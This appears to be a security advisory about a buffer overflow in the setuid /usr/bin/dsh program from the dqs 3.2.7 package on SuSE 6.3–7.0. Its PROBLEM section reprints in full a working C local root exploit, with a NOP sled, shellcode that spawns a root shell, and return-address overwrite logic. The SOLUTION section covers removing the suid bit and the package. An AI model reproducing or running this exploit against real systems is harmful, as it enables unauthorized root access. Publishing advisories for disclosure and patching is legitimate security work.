COMMAND

    dqs

SYSTEMS AFFECTED

    dqs 3.2.7 (SusE 6.3, 6.4, 7.0 have the dqs 3.2.7 by default)

PROBLEM

    'dex  dex'   found  following.    He  found   a  buffer   overflow
    vunerability on the /usr/bin/dsh (dqs 3.2.7 package).

    If a long line on the  first argument is gived, the program  gives
    a  SIGSEGV  signal.   SusE  6.3,  6.4,  7.0  have the dqs 3.2.7 by
    default an then it are vunerable, maybe others.

    You can found the exploit at

        www.raza-mexicana.org/programas/programas/qsexp.c

    And here it is:

    /* - dqsexp.c - */
    /********************************************************************/
    /* /usr/bin/dsh(dqs 3.2.7 package) local root exploit.              */
    /* SuSE 6.3, 6.4, and 7.0 are vunerable.                            */
    /* dex@raza-mexicana.org <> http://www.raza-mexicana.org            */
    /* Saludos: dr_fdisk^, yield, vlad, deadsector, trovalz, fatal,     */
    /* megaflop y a todo raza. que weba escribirlos todos XD.           */
    /* En especial saludos al espa~olete(NOP) :P, ya sabes porque.      */
    /*                                                                  */
    /*        - dex@raza-mexicana.org <> http://www.raza-mexicana.org - */
    /********************************************************************/
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    
    #define BUFFSIZE 2772
    #define OFFSET 0
    #define ALIGN 0
    
    unsigned long get_sp(void) {
    __asm__("movl %esp, %eax");
    }
    
    static char code[]=                      /* stolen
    from mount.c :P   */
    
      "\x29\xc0"                             /* subl %eax, %eax          */
      "\xb0\x46"                             /* movb $70, %al            */
      "\x29\xdb"                             /* subl %ebx, %ebx          */
      "\xb3\x0c"                             /* movb $12, %bl            */
      "\x80\xeb\x0c"                         /* subb $12, %bl */
      "\x89\xd9"                             /* movl %ebx, %ecx          */
      "\xcd\x80"                             /* int  $0x80                */
      "\xeb\x18"                             /* jmp  callz                */
      "\x5e"                                 /* popl %esi                */
      "\x29\xc0"                             /* subl %eax, %eax          */
      "\x88\x46\x07"                         /* movb %al, 0x07(%esi)     */
      "\x89\x46\x0c"                         /* movl %eax, 0x0c(%esi)    */
      "\x89\x76\x08"                         /* movl %esi, 0x08(%esi)    */
      "\xb0\x0b"                             /* movb $0x0b, %al          */
      "\x87\xf3"                             /* xchgl %esi, %ebx         */
      "\x8d\x4b\x08"                         /* leal 0x08(%ebx), %ecx    */
      "\x8d\x53\x0c"                         /* leal 0x0c(%ebx), %edx    */
      "\xcd\x80"                             /* int $0x80                */
      "\xe8\xe3\xff\xff\xff"                 /* call start               */
      "\x2f\x62\x69\x6e\x2f\x73\x68";
    
    
    void main(int argc, char **argv) {
    
    int i;
    unsigned long addr;
    
    char *buffer;
    
    int offset=OFFSET;
    int buffsize=BUFFSIZE;
    int align=ALIGN;
    
    if (argc > 1 ) offset = atoi(argv[1]);
    if (argc > 2 ) align = atoi(argv[2]);
    if (argc > 3 ) buffsize = atoi(argv[3]);
    
    buffer = (char *)malloc(buffsize + 8);
    
    addr = get_sp() - offset;
    
    for(i = 0; i < buffsize; i += 4) {
       *(long *)&buffer[i] = 0x90909090;
     }
    
     *(long *)&buffer[buffsize - 8] = addr;
     *(long *)&buffer[buffsize - 4] = addr;
    
     memcpy(buffer + buffsize - 8 - strlen(code) - align, code, strlen(code));
    
    
    printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n");
     printf("[*] /usr/bin/dsh(dqs 3.2.7 package) local root exploit.\n");
     printf("[*] - dex@raza-mexicana.org <> http://www.raza-mexicana.org - \n");
    
    printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
    
     printf("[*] Address=0x%x, Align=%d, Offset=%d\n", addr, align, offset);
    
    printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
     printf("[*] Starting....\n");
    
     execl("/usr/bin/dsh", "dsh", buffer, "/etc/motd",  NULL);
    }

SOLUTION

    SuSE confirmed this vulnerability and that dqs has the setuid  bit
    on the  file /usr/bin/dsh,  but the  package (as  a package in the
    clustering series) is not installed by default.

    The fix (to remove the suid bit) is correct.  If you have selected
    to  set  the  variable  PERMISSION_SECURITY  in  /etc/rc.config to
    "secure  local"  in  SuSE-7.1  (recommended  for security-enhanced
    settings), you are  not vulnerable.   On SuSE-7.1, in  addition to
    the chmod command below, change the files /etc/permissions.*, too,
    to reflect the removed suid bit.

    If you do  not need the  dqs package, simply  remove it using  the
    command rpm -e dqs

    Of course, SuSE will provide update packages as soon as possible.

    The  original  publisher  (SCRI,  Florida  State University) is no
    longer maintaining DQS or  employing the original author,  but has
    also  refused  to  relax  distribution  restrictions,  making   it
    difficult to found a new developer community.